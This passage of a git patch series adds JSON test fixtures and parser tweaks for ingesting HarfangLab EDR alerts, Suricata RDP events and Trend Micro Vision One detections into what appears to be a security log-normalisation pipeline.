-servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}",
+    "event": {
+      "category": [
+        "process"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2024-11-18T09:18:31.558000Z",
+    "agent": {
+      "id": "11111111-aaaa-bbbb-cccc-222222222222",
+      "name": "harfanglab"
+    },
+    "file": {
+      "hash": {
+        "md5": "b4e821b2dac20d8d2ac6889f9c3fc315",
+        "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f",
+        "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45"
+      }
+    },
+    "harfanglab": {
+      "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c",
+      "alert_subtype": "process",
+      "alert_time": "2024-11-18T09:18:31.852+00:00",
+      "alert_unique_id": "11111111-2222-3333-4444-555555555555",
+      "execution": 0,
+      "groups": [
+        "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}"
+      ],
+      "level": "medium",
+      "status": "new"
+    },
+    "host": {
+      "domain": "DOMAINSI",
+      "hostname": "HOST01",
+      "name": "HOST01",
+      "os": {
+        "full": "Windows 10 Pro",
+        "version": "10.0.19045"
+      }
+    },
+    "log": {
+      "hostname": "HOST01"
+    },
+    "process": {
+      "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca",
+      "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe",
+      "name": "AppInstaller.exe",
+      "parent": {
+        "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p",
+        "executable": "C:\\Windows\\System32\\svchost.exe"
+      },
+      "pe": {
+        "company": "Microsoft Corporation",
+        "description": "AppInstaller.exe",
+        "file_version": "1.24.25180.00000",
+        "imphash": "714FD4ADFC932C947A3949463867BE18",
+        "original_file_name": "AppInstaller.exe",
+        "product": "Microsoft Desktop App Installer"
+      },
+      "pid": 20188,
+      "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\"
+    },
+    "related": {
+      "hash": [
+        "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45",
+        "a53b060cfb5e23508b4f9658d904cd7cb659de7f",
+        "b4e821b2dac20d8d2ac6889f9c3fc315"
+      ],
+      "hosts": [
+        "HOST01"
+      ],
+      "user": [
+        "DOMAINSI\\JDOE"
+      ]
+    },
+    "rule": {
+      "category": "sigma",
+      "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n",
+      "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+      "name": "Package Installed via AppInstaller from the Internet"
+    },
+    "url": {
+      "domain": "url.integration.com",
+      "original": "https://url.integration.com/test",
+      "path": "/test",
+      "port": 443,
+      "registered_domain": "integration.com",
+      "scheme": "https",
+      "subdomain": "url",
+      "top_level_domain": "com"
+    },
+    "user": {
+      "name": "DOMAINSI\\JDOE",
+      "roles": "DOMAIN_Postes_de_travail_Windows"
+    }
+  }
+}
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json
new file mode 100644
index 000000000..0f68a7c8c
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/alert_5.json
@@ -0,0 +1,88 @@
+{
+  "input": {
+    "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n    - https://attack.mitre.org/techniques/T1098/\\n    - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.persistence\\n    - attack.t1098\\n    - attack.privilege_escalation\\n    - attack.t1078.003\\nlogsource:\\n    product: windows\\n    service: security\\ndetection:\\n    selection:\\n        EventID: 4732\\n        GroupSid: S-1-2-3-4\\n    exclusion:\\n        - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n        - SubjectUserName|endswith: \\n    condition: selection and not exclusion\\nfalsepositives:\\n  - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n    - https://attack.mitre.org/techniques/T1098/\\n    - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.persistence\\n    - attack.t1098\\n    - attack.privilege_escalation\\n    - attack.t1078.003\\nlogsource:\\n    product: windows\\n    service: security\\ndetection:\\n    selection:\\n        EventID: 4732\\n        GroupSid: S-1-2-3-4\\n    exclusion:\\n        - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n        - SubjectUserName|endswith: \\n    condition: selection and not exclusion\\nfalsepositives:\\n  - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "HarfangLab EDR",
+        "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n    - https://attack.mitre.org/techniques/T1098/\\n    - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.persistence\\n    - attack.t1098\\n    - attack.privilege_escalation\\n    - attack.t1078.003\\nlogsource:\\n    product: windows\\n    service: security\\ndetection:\\n    selection:\\n        EventID: 4732\\n        GroupSid: S-1-2-3-4\\n    exclusion:\\n        - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n        - SubjectUserName|endswith: \\n    condition: selection and not exclusion\\nfalsepositives:\\n  - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n    - https://attack.mitre.org/techniques/T1098/\\n    - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.persistence\\n    - attack.t1098\\n    - attack.privilege_escalation\\n    - attack.t1078.003\\nlogsource:\\n    product: windows\\n    service: security\\ndetection:\\n    selection:\\n        EventID: 4732\\n        GroupSid: S-1-2-3-4\\n    exclusion:\\n        - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n        - SubjectUserName|endswith: \\n    condition: selection and not exclusion\\nfalsepositives:\\n  - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}",
+    "event": {
+      "dataset": "alert",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-12T08:39:14.017000Z",
+    "action": {
+      "properties": {
+        "MemberName": "DOEJ",
+        "SubjectDomainName": "NT_DOMAIN",
+        "SubjectLogonId": "0x1234567",
+        "SubjectUserName": "sw-suser",
+        "SubjectUserSid": "S-1-2-4-5-6",
+        "TargetDomainName": "Builtin",
+        "TargetSid": "S-1-2-3-4",
+        "TargetUserName": "Administrateurs"
+      }
+    },
+    "agent": {
+      "id": "11111111-aaaa-2222-bbbb-333333333333",
+      "name": "harfanglab"
+    },
+    "harfanglab": {
+      "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb",
+      "alert_subtype": "eventlog",
+      "alert_time": "2024-11-12T08:39:14.017+00:00",
+      "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc",
+      "execution": 0,
+      "groups": [
+        "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}",
+        "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}"
+      ],
+      "level": "medium",
+      "status": "new"
+    },
+    "host": {
+      "domain": "NT_DOMAIN",
+      "hostname": "PC01",
+      "name": "PC01",
+      "os": {
+        "full": "Windows 10 Enterprise",
+        "version": "10.0.19045"
+      }
+    },
+    "log": {
+      "hostname": "PC01"
+    },
+    "organization": {
+      "id": "3b37ffc8520ef542"
+    },
+    "related": {
+      "hosts": [
+        "PC01"
+      ],
+      "user": [
+        "sw-suser"
+      ]
+    },
+    "rule": {
+      "category": "sigma",
+      "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.",
+      "id": "12345678-abcd-ef90-1234-123456abcdef",
+      "name": "User Account Added to the Local Administrators Group"
+    },
+    "user": {
+      "domain": "NT_DOMAIN",
+      "name": "sw-suser",
+      "roles": "Postesdetravail,Postesdetravail:Lot3",
+      "target": {
+        "domain": "Builtin",
+        "name": "Administrateurs"
+      }
+    }
+  }
+}
\ No newline at end of file

From 81af8ce7ab0e33cdb80e2a599e2a417641a45c5d Mon Sep 17 00:00:00 2001
From: Erwan Chevalier <erwan.chevalier@sekoia.fr>
Date: Fri, 29 Nov 2024 16:20:57 +0100
Subject: [PATCH 298/317] fix(suricata): missing rdp smart description

---
 .../suricata/_meta/smart-descriptions.json    | 16 ++++++
 Suricata/suricata/tests/rdp.json              | 57 +++++++++++++++++++
 2 files changed, 73 insertions(+)
 create mode 100644 Suricata/suricata/tests/rdp.json

diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json
index fc89638e0..b330a23c1 100644
--- a/Suricata/suricata/_meta/smart-descriptions.json
+++ b/Suricata/suricata/_meta/smart-descriptions.json
@@ -198,6 +198,22 @@
       }
     ]
   },
+  {
+    "value": "RDP traffic from  {source.ip} to {destination.ip}",
+    "conditions": [
+      {
+        "field": "action.type",
+        "value": "rdp"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "requested"
+      }
+    ]
+  },
   {
     "value": "Traffic flow from  {source.ip} with {user_agent.original} to {destination.ip} with {http.request.method} request to {url.original}",
     "conditions": [
diff --git a/Suricata/suricata/tests/rdp.json b/Suricata/suricata/tests/rdp.json
new file mode 100644
index 000000000..131dd7025
--- /dev/null
+++ b/Suricata/suricata/tests/rdp.json
@@ -0,0 +1,57 @@
+{
+  "input": {
+    "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Suricata",
+        "dialect_uuid": "331fa58d-8cf9-454a-a87f-48a3dc07d4d3"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "type": [
+        "connection"
+      ]
+    },
+    "@timestamp": "2024-11-29T15:08:06.239558Z",
+    "action": {
+      "type": "rdp"
+    },
+    "destination": {
+      "address": "10.0.1.4",
+      "ip": "10.0.1.4",
+      "port": 3389
+    },
+    "host": {
+      "ip": "14.225.46.243"
+    },
+    "network": {
+      "community_id": "1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=",
+      "protocol": "TCP",
+      "transport": "TCP"
+    },
+    "observer": {
+      "ingress": {
+        "interface": {
+          "name": "eth0"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "10.0.1.4",
+        "14.225.46.243"
+      ]
+    },
+    "source": {
+      "address": "14.225.46.243",
+      "ip": "14.225.46.243",
+      "port": 58953
+    }
+  }
+}
\ No newline at end of file

From ce88fe4040225391a5378a96ae5662a97725203a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 29 Nov 2024 17:16:26 +0100
Subject: [PATCH 299/317] fix(Harfanglab): add event.kind: 'alert' for
 harfanglab alerts

---
 HarfangLab/harfanglab/ingest/parser.yml  | 1 +
 HarfangLab/harfanglab/tests/alert_5.json | 1 +
 2 files changed, 2 insertions(+)

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 93671efde..5050c7429 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -229,6 +229,7 @@ stages:
   alert_info:
     actions:
       - set:
+          event.kind: "alert"
           harfanglab.level: "{{json_event.message.level}}"
           rule.description: "{{json_event.message.msg}}"
           rule.name: "{{json_event.message.rule_name}}"
diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json
index 0f68a7c8c..19abfe567 100644
--- a/HarfangLab/harfanglab/tests/alert_5.json
+++ b/HarfangLab/harfanglab/tests/alert_5.json
@@ -12,6 +12,7 @@
     "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n    - https://attack.mitre.org/techniques/T1098/\\n    - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.persistence\\n    - attack.t1098\\n    - attack.privilege_escalation\\n    - attack.t1078.003\\nlogsource:\\n    product: windows\\n    service: security\\ndetection:\\n    selection:\\n        EventID: 4732\\n        GroupSid: S-1-2-3-4\\n    exclusion:\\n        - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n        - SubjectUserName|endswith: \\n    condition: selection and not exclusion\\nfalsepositives:\\n  - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n    - https://attack.mitre.org/techniques/T1098/\\n    - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.persistence\\n    - attack.t1098\\n    - attack.privilege_escalation\\n    - attack.t1078.003\\nlogsource:\\n    product: windows\\n    service: security\\ndetection:\\n    selection:\\n        EventID: 4732\\n        GroupSid: S-1-2-3-4\\n    exclusion:\\n        - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n        - SubjectUserName|endswith: \\n    condition: selection and not exclusion\\nfalsepositives:\\n  - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}",
     "event": {
       "dataset": "alert",
+      "kind": "alert",
       "type": [
         "info"
       ]

From a71e4ec1bc766f78582c816d8633d8b733aa7790 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 2 Dec 2024 09:54:25 +0100
Subject: [PATCH 300/317] fix(TrendMicroVisionOne): add action result

---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml             | 1 +
 .../tests/test_eicar_test_file_detection.json                    | 1 +
 2 files changed, 2 insertions(+)

diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 0353bb37b..988fe612e 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -37,6 +37,7 @@ stages:
           rule.id: "{{parsed_event.message.model.modelId}}"
 
           event.url: "{{parsed_event.message.model.workbenchLink}}"
+          event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 
       - set:
           user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index 5fb30866d..e503353f1 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json	
@@ -5,6 +5,7 @@
   "expected": {
     "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": 